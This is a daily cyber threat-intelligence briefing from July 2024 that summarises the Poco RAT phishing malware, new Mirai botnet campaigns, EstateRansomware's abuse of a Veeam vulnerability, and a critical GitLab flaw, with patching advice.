Cookie Settings

This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.

Cyware Daily Threat Intelligence

Cyware Daily Threat Intelligence - Featured Image

Daily Threat Briefing Jul 11, 2024

A nefarious phishing campaign has unleashed the new Poco RAT malware, wreaking havoc across mining, manufacturing, hospitality, and utility sectors. The Delphi-coded malware underscores a keen focus on Latin American territories.

Enter EstateRansomware, an emergent ransomware menace capitalizing on a long-patched Veeam vulnerability. By exploiting the Veeam flaw, the attackers siphon user credentials and gain backdoor access.

Meanwhile, the Mirai botnet’s relentless evolution perpetuates cybersecurity nightmares. Recent offensives exploit myriad web vulnerabilities, targeting over 1,200 websites.

Top Malware Reported in the Last 24 Hours

New Poco RAT emerges

A phishing campaign targeting Spanish language victims is delivering a new malware called Poco RAT, primarily affecting mining, manufacturing, hospitality, and utilities sectors. Threat actors are using finance-themed lures in phishing messages, HTML or PDF files, and Google Drive links to propagate Poco RAT, bypassing secure email gateways. The use of Delphi-based malware and geolocation restrictions on the command-and-control server indicates a focus on Latin America, while similar social engineering campaigns and data theft attacks are also on the rise.

New Mirai botnets spotted

The Mirai botnet continues to evolve and pose significant cybersecurity threats, with recent campaigns exploiting known web vulnerabilities to target over 1,200 sites. Imperva Threat Research has identified over 200 malicious URLs and 230 distinct malware samples, including bash scripts and ELF binaries, used in these attacks. The malware is typically delivered by exploiting known web vulnerabilities to execute shell commands that download and execute second-stage binaries.

Top Vulnerabilities Reported in the Last 24 Hours

New ransomware group abuses Veeam bug

A new ransomware group called EstateRansomware is exploiting a Veeam vulnerability (CVE-2023-27532) that was patched over a year ago to deploy file-encrypting malware and extort payments. The gang gains initial access through brute force attacks on FortiGate firewall SSL VPN appliances. They then establish RDP connections and deploy a backdoor to ensure persistent access. The attackers exploit the Veeam vulnerability to steal user credentials and deploy the ransomware. Veeam had warned about this vulnerability and released a patch in March 2023. It's crucial for users to install software updates to avoid falling victim to malware.

Critical vulnerability in GitLab product

GitLab has identified a critical vulnerability in its Community and Enterprise editions, allowing attackers to run pipeline jobs as any user. The flaw, tracked as CVE-2024-6385, affects versions 15.8 to 17.1.2. GitLab has released updates to address the issue and urges immediate installation. This is the latest in a series of vulnerabilities, with previous flaws enabling account takeover and zero-click attacks.

Related Threat Briefings